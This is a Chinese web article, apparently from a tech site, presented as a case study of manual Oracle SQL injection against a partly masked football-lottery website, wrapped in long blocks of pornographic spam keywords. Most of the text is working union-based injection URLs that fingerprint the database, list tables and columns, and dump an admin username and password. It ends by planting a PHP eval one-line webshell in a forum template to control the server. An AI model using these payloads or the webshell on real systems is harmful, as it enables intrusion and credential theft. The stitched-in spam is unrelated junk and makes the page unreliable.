精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

參考案例:手工Oracle注入某足彩在線網(wǎng)站

安全 應(yīng)用安全
某足彩在線網(wǎng)站是一個(gè)大型的足彩站點(diǎn),在其中存在著注入點(diǎn),鏈接如下:http://www.****china.com/jst/md_end.jsp?id=76,以該注入點(diǎn)為例,講解如何進(jìn)行Oracle手工注入攻擊檢測(cè)。

某足彩在線網(wǎng)站是一個(gè)大型的足彩站點(diǎn),在其中存在著注入點(diǎn),鏈接如下:http://www.****china.com/jst/md_end.jsp?id=76,以該注入點(diǎn)為例,講解如何進(jìn)行Oracle手工注入攻擊檢測(cè)。

判斷注入點(diǎn)

在鏈接地址后加上單引號(hào),返回信息"java.sql.SQLException: ORA-01756",可初步判斷為Oracle的數(shù)據(jù)庫。

在鏈接后添加提交"/*",返回錯(cuò)誤頁面,說明數(shù)據(jù)庫不是MySQL的。繼續(xù)在注入點(diǎn)鏈接后添加"--",顯示正常頁面,說明數(shù)據(jù)庫可能為MSSQL和Oracle。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from user_tables)>0--

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from dual)>0--

都返回正常頁面(圖1),確認(rèn)為Oracle的數(shù)據(jù)庫。

圖1  確認(rèn)Oracle注入

圖1  確認(rèn)Oracle注入#p#

字段數(shù)目與字段類型檢測(cè)

先檢測(cè)注入點(diǎn)處查詢字段數(shù)目,提交:

http://www.****china.com/jst/md_end.jsp?id=76 order by 10  //返回錯(cuò)誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 5  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 8  //返回錯(cuò)誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 order by 7  //返回正常頁面

說明當(dāng)前表存在7個(gè)字段。下面再來檢測(cè)字段類型,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 1,2,3,4,5,6,7 from dual

返回錯(cuò)誤信息,提示(圖2):

expression must have same datatype

圖2  數(shù)據(jù)類型錯(cuò)誤

圖2  數(shù)據(jù)類型錯(cuò)誤#p#

很顯然,提交的字段類型不正確,所以查詢出錯(cuò)。于是改為提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,null,null,null,null from dual

返回正常頁面,說明字段數(shù)目確實(shí)為7個(gè),但是需要確定字段類型。依次提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 'null',null,null,null,null,null,null from dual  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,'null',null,null,null,null,null from dual  //返回錯(cuò)誤頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,'null',null,null,null,null from dual  //返回正常頁面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,'null',null,null,null from dual  //返回正常頁面

……

上面的查詢中,用'null'字符串檢測(cè)該字段處是否為字符型,如果返回正常頁面則說明為字符型數(shù)據(jù),返回錯(cuò)誤頁面,則說明該處為數(shù)字型。

提交檢測(cè)完畢后,確認(rèn)1,3,4,6,7位置處為字符型。提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3','4',5,'6','7' from dual

返回正常頁面(圖3),說明字段類型正確。

圖3  確認(rèn)數(shù)據(jù)類型

圖3  確認(rèn)數(shù)據(jù)類型

檢測(cè)注入點(diǎn)信息

對(duì)注入點(diǎn)進(jìn)行簡(jiǎn)單的信息檢測(cè),可選擇字符型字段處顯示要查詢的信息,提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select (select banner from sys.v_$version where rownum=1),2,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual), (select member from v$logfile where rownum=1),5,'6', (select instance_name from v$instance) from dual

從返回頁面中得到各種信息(圖4):

數(shù)據(jù)庫版本為Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi;

前數(shù)據(jù)庫連接用戶名為TOTO;

操作系統(tǒng)平臺(tái)為L(zhǎng)inux;

服務(wù)器sid為racdb2。

圖4  返回注入點(diǎn)各種信息

圖4  返回注入點(diǎn)各種信息#p#

查詢獲取表名

先來查詢一下當(dāng)前數(shù)據(jù)庫中的表名,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1),5,'6','7' from dual

這里選擇了字段4處返回信息,得到第1個(gè)表名為ACCOUNTS

圖5

這里選擇了字段4處返回信息,得到第1個(gè)表名為ACCOUNTS(圖5)。

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS'),5,'6','7' from dual

注意,表名一定要大寫。提交后返回第2個(gè)表名為A_USER。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select table_name from user_tables where rownum=1 and table_name<>'ACCOUNTS' and table_name<>'A_USER'),5,'6','7' from dual

得到第3個(gè)表名BOBO_URL_INFO。用同樣的方法,可得到其它所有表名,發(fā)現(xiàn)其中有一個(gè)極為重要的表名USERMG。#p#

查詢獲取字段名及內(nèi)容

選擇對(duì)USERMG表進(jìn)行查詢,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and rownum=1),5,'6','7' from dual

返回USERMG表中第一個(gè)字段名USER_NAME,再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3',(select column_name from user_tab_columns where table_name='USERMG' and column_name<>'USER_NAME' and rownum=1),5,'6','7' from dual

圖6  返回表中字段名

圖6  返回表中字段名

返回第2個(gè)字段名USER_PASS(圖6)。這兩個(gè)字段名很明顯是用來存儲(chǔ)用戶名和密碼的,直接查詢其內(nèi)容:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select USERNAME,2,'3',USER_PASS,5,'6','7' from USERMG

返回頁面中,得到了用戶名和密碼為:admin/toto11admin(圖7)。

圖7  獲得管理員帳號(hào)數(shù)據(jù)

圖7  獲得管理員帳號(hào)數(shù)據(jù)#p#

登陸后臺(tái)上傳WebShell

沒有直接查找到網(wǎng)站的后臺(tái),但是利用管理員帳號(hào),可以從前臺(tái)進(jìn)行登錄。登錄進(jìn)入后,發(fā)現(xiàn)可進(jìn)入體彩論壇,在論壇中在論壇后臺(tái)管理頁面,直接用此帳號(hào)進(jìn)行登陸,進(jìn)入論壇管理后臺(tái)。

在"論壇管理"→"界面風(fēng)格"→"默認(rèn)風(fēng)格"→"詳情"中,點(diǎn)擊"新增變量",將變量?jī)?nèi)容設(shè)置為:

', '#999');eval($_POST[c]);

圖8  添加變量寫入一句話木馬

圖8  添加變量寫入一句話木馬

替換內(nèi)容可隨便填(圖8)。點(diǎn)擊"提交"按鈕后,一句話木馬就被寫入模板風(fēng)格文件中了。用一句話木馬連接論壇風(fēng)格頁面文件:

http://bbs.****china.com/forumdata/cache/style_1.php

圖9  連接一句話木馬

圖9  連接一句話木馬

密碼為c,粘貼入要上傳的WebShell代碼內(nèi)容,即可連接一句話木馬獲得WebShell(圖9)。WebShell的權(quán)限比較大,可輕易的控制遠(yuǎn)程網(wǎng)站服務(wù)器。

【編輯推薦】

  1. Oracle注入點(diǎn)信息基本檢測(cè)
  2. Oracle listener程序所存在安全漏洞有哪些?
  3. OpenWorld案例分享:Oracle透明數(shù)據(jù)加密技術(shù)
  4. Oracle數(shù)據(jù)庫內(nèi)部安全威脅:審計(jì)特權(quán)用戶
責(zé)任編輯:佟健 來源: 《大中型網(wǎng)絡(luò)入侵要案》
相關(guān)推薦

2013-01-11 16:31:27

2019-05-06 09:26:52

Java在線網(wǎng)站瀏覽器

2015-07-07 10:37:41

2015-04-03 09:35:57

2012-03-31 14:00:13

CompuwareGomez應(yīng)用性能測(cè)試

2025-01-14 14:10:40

2010-04-13 14:35:17

2010-06-25 16:04:56

2011-04-11 13:19:41

Oracle數(shù)據(jù)庫

2010-05-06 09:30:16

Oracle創(chuàng)建數(shù)據(jù)庫

2013-03-29 10:57:45

2010-11-01 17:22:44

2010-04-07 11:56:58

Oracle JOB

2009-04-13 11:25:46

IBMdWEclipse

2009-01-26 20:33:17

2009-07-03 16:22:13

2009-11-04 17:52:35

Oracle用戶管理

2010-09-13 14:03:58

2011-09-27 09:39:22

2018-12-18 09:06:07

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

久久久久免费| 亚瑟一区二区三区四区| 一区二区三区成人| 国产一区免费观看| 日韩国产成人在线| 亚洲综合色站| 国产偷亚洲偷欧美偷精品| 亚洲少妇久久久| 国产丝袜在线播放| 国产日本亚洲高清| 成人免费在线一区二区三区| 亚洲黄色免费观看| av亚洲免费| 亚洲的天堂在线中文字幕| 日韩av片网站| 51精品在线| 综合电影一区二区三区| 久久青青草原| 国产黄色免费大片| 日韩国产一区二| 欧美激情视频网| 长河落日免费高清观看| 好吊妞视频这里有精品| 欧美人狂配大交3d怪物一区| 69堂免费视频| a毛片不卡免费看片| 中文字幕亚洲欧美在线不卡| 免费av在线一区二区| 性一交一乱一乱一视频| 久久成人麻豆午夜电影| 日韩av电影免费观看高清| 精品少妇久久久久久888优播| 999精品网| 亚洲女同一区二区| 视频一区视频二区视频三区视频四区国产 | y97精品国产97久久久久久| 人妖粗暴刺激videos呻吟| 在线成人免费| 欧美人成免费网站| 亚洲36d大奶网| 精品123区| 日韩欧美主播在线| 欧洲黄色一级视频| 波多野在线观看| 亚洲自拍偷拍九九九| 国产成人精品免费看在线播放| 性猛交xxxx乱大交孕妇印度| 狠狠网亚洲精品| 国产精品一区=区| 日韩国产成人在线| 日韩av在线发布| 日韩美女激情视频| 国产午夜无码视频在线观看| 久久资源在线| 日韩美女在线观看一区| 亚洲天堂五月天| 美女视频一区免费观看| 奇米成人av国产一区二区三区| 高清国产在线观看| 不卡中文一二三区| 在线日韩精品视频| 国产精品一区二区亚洲| 成人久久综合| 色哟哟亚洲精品一区二区| 中文字幕第69页| 天天综合网网欲色| 欧美xxxx14xxxxx性爽| 日韩欧美中文字幕视频| 黄色日韩精品| 欧美亚洲国产成人精品| 狠狠人妻久久久久久综合| 日韩成人av影视| 国产色婷婷国产综合在线理论片a| 国产精品第56页| 夜夜嗨网站十八久久| 欧美一区二区.| 中文字幕高清在线免费播放| 日韩电影免费在线观看网站| 国产原创欧美精品| 国产99对白在线播放| 不卡区在线中文字幕| 欧美日韩在线精品一区二区三区| 不卡视频免费在线观看| 丁香婷婷深情五月亚洲| 国产免费一区二区三区| 国产无套粉嫩白浆在线2022年| 本田岬高潮一区二区三区| 蜜桃视频成人| 国产福利视频在线观看| 亚洲国产日韩一区二区| 黄色国产小视频| www一区二区三区| 亚洲福利视频网站| 手机毛片在线观看| 亚洲日产国产精品| 国产精品视频精品视频| 丰满人妻一区二区三区四区53| 久草热8精品视频在线观看| 99九九电视剧免费观看| 国产视频三级在线观看播放| 亚洲欧美电影一区二区| 欧美综合在线观看视频| 秋霞午夜一区二区三区视频| 亚洲精品一区二区在线| 国产精品国产精品88| 亚洲欧美日韩在线观看a三区 | 一区二区三区四区视频在线| 中文在线字幕免费观看| 一本色道综合亚洲| 韩国av中国字幕| 欧美特黄一级大片| 国产69精品久久久久99| 91久久国语露脸精品国产高跟| 美女网站在线免费欧美精品| 国产亚洲福利社区| 国产二区三区在线| 在线免费观看日本欧美| 国产69视频在线观看| 日韩亚洲一区在线| 欧美野外猛男的大粗鳮| 亚洲奶汁xxxx哺乳期| 亚洲欧洲韩国日本视频| av免费中文字幕| 精品少妇3p| 欧美久久久精品| 一级黄色大片网站| 日本一区二区免费在线| 国产特级黄色大片| av动漫精品一区二区| 久久视频精品在线| 伊人网视频在线| 国产偷国产偷精品高清尤物| 少妇av一区二区三区无码| 日韩欧美另类中文字幕| 日韩日本欧美亚洲| 亚洲中文字幕一区二区| 欧美经典三级视频一区二区三区| 亚洲精品人成| 亚洲成人va| 国产午夜精品一区理论片飘花| 国产伦精品一区二区三区视频女| 中文精品久久| 成人激情视频在线播放| 成av人电影在线观看| 在线观看国产91| 中文字幕成人动漫| 日本不卡中文字幕| 亚洲成人一区二区三区| 青青草国产一区二区三区| 原创国产精品91| 国产在成人精品线拍偷自揄拍| 成人免费视频app| 日本a在线天堂| 日本一区二区三区电影免费观看 | av网站在线免费观看| 欧美日韩国产色| 在线 丝袜 欧美 日韩 制服| 性欧美xxxx大乳国产app| 欧美日韩免费高清| 精品成人av| xxav国产精品美女主播| 精品黑人一区二区三区在线观看| 久久精品综合网| 亚洲人成色77777| 欧美日韩在线网站| 成人激情av在线| 18video性欧美19sex高清| 日韩国产精品一区| 亚洲天堂网在线视频| 亚洲欧美日韩国产中文在线| 国产原创剧情av| 久久国产精品亚洲77777| 亚洲精品二区| 亚洲图色一区二区三区| 日本精品久久久久久久| 川上优的av在线一区二区| 欧美精品成人一区二区三区四区| 中文字幕第20页| 国内精品在线播放| 97超碰国产精品| 综合亚洲自拍| 国产自产女人91一区在线观看| 每日更新在线观看av| 欧美日韩一二三四五区| 欧美大波大乳巨大乳| 精久久久久久久久久久| av女优在线播放| 国内精品视频在线观看| 亚洲va久久久噜噜噜| 超碰在线公开| yellow中文字幕久久| 天天干天天草天天射| 欧美色倩网站大全免费| 国产一级片视频| 久久精品网站免费观看| 永久看看免费大片| 久久精品动漫| 成人在线国产视频| 久久在线播放| 美乳视频一区二区| 亚洲超碰在线观看| 国产日韩欧美日韩| 在线观看的黄色| 久久99精品久久久久久青青91| 国产成人精品毛片| 91久久国产最好的精华液| 午夜爱爱毛片xxxx视频免费看| 国产一区二区三区黄视频| 可以在线看的av网站| 91精品国产自产在线观看永久∴| 亚洲永久免费观看| 99re66热这里只有精品4| 高清一区二区三区日本久| 免费av网站在线看| 亚洲一区999| 日韩在线观看视频一区二区三区| 亚洲午夜免费视频| 国产麻豆a毛片| 欧美激情一区二区在线| 97超碰在线免费观看| 成人午夜在线播放| 无套白嫩进入乌克兰美女| 麻豆精品一二三| 国产一区视频免费观看| 国产偷自视频区视频一区二区| 日本一区二区三区精品视频| 国产精品久久久久久久久久白浆| 97精品在线观看| 国内在线视频| 欧美日韩国产第一页| 黄色在线视频网站| 色yeye香蕉凹凸一区二区av| 精品无人乱码| 亚洲免费电影一区| 欧洲视频在线免费观看| 亚洲精品电影网| 深夜福利视频网站| 精品久久久久久久久久久久包黑料| 久久一区二区三区视频| 亚洲成av人片在www色猫咪| 久久久久久久久久久网| 亚洲精品ww久久久久久p站| 天天色影综合网| 亚洲日本中文字幕区| 成人免费精品动漫网站| 亚洲美女在线国产| 欧美在线视频第一页| 有码一区二区三区| 国产精品99re| 偷拍与自拍一区| 免费看日批视频| 在线视频你懂得一区二区三区| 久久久久亚洲AV| 亚洲成人av在线电影| 国产在线观看免费av| 亚洲天堂a在线| 私库av在线播放| 亚洲一区免费观看| 精品在线播放视频| 91极品视觉盛宴| 伊人精品一区二区三区| 91精品免费在线观看| 亚洲av综合色区无码一区爱av| 在线免费观看不卡av| 一本色道久久综合亚洲| 欧美军同video69gay| 精品国产av鲁一鲁一区| 亚洲精品久久久一区二区三区| 一二三四区在线| 日韩欧美中文字幕一区| 五月天激情开心网| 一区二区亚洲精品国产| 国产黄色小视频在线| 欧美激情视频网址| 免费观看亚洲| 成人精品视频99在线观看免费| 性欧美18一19sex性欧美| 国产日韩欧美视频| a级日韩大片| 日本高清不卡一区二区三| 久久久久国产| 波多野结衣家庭教师在线| 日av在线不卡| 国产综合内射日韩久| 久久久.com| 国产亚洲精久久久久久无码77777| 亚洲男人天堂一区| 国产一区二区99| 91精品啪在线观看国产60岁| 欧美老女人性开放| 欧美日韩xxxxx| 色综合天天色| 国产精品国产一区二区| 成人影院在线| 一女被多男玩喷潮视频| 蜜臀av一区二区在线免费观看| 国产九九在线视频| 国产久卡久卡久卡久卡视频精品| 国产91色在线观看| 不卡一区在线观看| 永久免费看片视频教学| 欧美日韩激情美女| 国产麻豆免费观看| 亚洲欧美中文字幕| 在线中文字幕-区二区三区四区| 九色成人免费视频| 3d性欧美动漫精品xxxx软件| 高清不卡日本v二区在线| 久久福利影院| 美女网站免费观看视频| 国产99久久精品| 天天操天天操天天操天天操天天操| 亚洲男女一区二区三区| 亚洲精品国产欧美在线观看| 亚洲第一区中文字幕| 成人在线视频亚洲| 国产精品视频99| 视频国产一区| 日本日本19xxxⅹhd乱影响| 粉嫩绯色av一区二区在线观看| 久久久久久久无码| 一区二区成人在线| 国产免费的av| 自拍偷拍亚洲区| 色婷婷综合久久久中字幕精品久久| 国产一区玩具在线观看| 精品一区二区三区的国产在线观看| 一本一道久久a久久综合精品 | 日韩亚洲第一页| 二吊插入一穴一区二区| 免费在线成人av电影| 亚洲三级影院| 久久性爱视频网站| 一级中文字幕一区二区| av高清一区二区| 久久综合88中文色鬼| 99tv成人影院| 中文字幕一区综合| 精品影院一区二区久久久| fc2ppv在线播放| 777a∨成人精品桃花网| 免费av在线播放| 91免费高清视频| 欧美黄色一区二区| 性高潮免费视频| 亚洲成年人影院| 日韩av成人| 日韩美女视频免费看| 波多野结衣的一区二区三区| 久久99爱视频| 中文字幕视频一区| 国产后入清纯学生妹| 九九热99久久久国产盗摄| 福利欧美精品在线| 一区二区传媒有限公司| 2024国产精品视频| 亚洲综合成人av| 色噜噜狠狠狠综合曰曰曰| 成人短视频软件网站大全app| 久久精品久久精品国产大片| 亚洲永久免费| 国产av自拍一区| 欧美日本精品一区二区三区| 老司机在线看片网av| 91成人免费视频| 国产伦理一区| 开心激情五月网| 亚洲第一在线视频| 国产精品极品美女在线观看| 一本久道久久综合| 成人精品小蝌蚪| 欧美日韩a v| 久久久精品美女| 欧美a一欧美| 国产喷水theporn| 一区二区三区四区精品在线视频| 中文字幕一区二区三区人妻四季| 亚洲国产成人精品一区二区| 日韩脚交footjobhd| 视频一区亚洲| 国产精品69久久久久水密桃| 免费观看一区二区三区毛片 | 性感美女一区二区三区| 图片区小说区国产精品视频| 北条麻妃在线| 91精品黄色| 久久精品系列| 99视频只有精品| 亚洲美女av在线播放| 电影中文字幕一区二区| 国产青青在线视频| 亚洲视频狠狠干| 欧美另类自拍| 国产精品免费一区二区三区观看| 99久久这里只有精品| 800av在线播放| 欧美一区二区三区人| 在线天堂资源www在线污| 神马午夜伦理影院| 国产欧美一区二区精品性色超碰|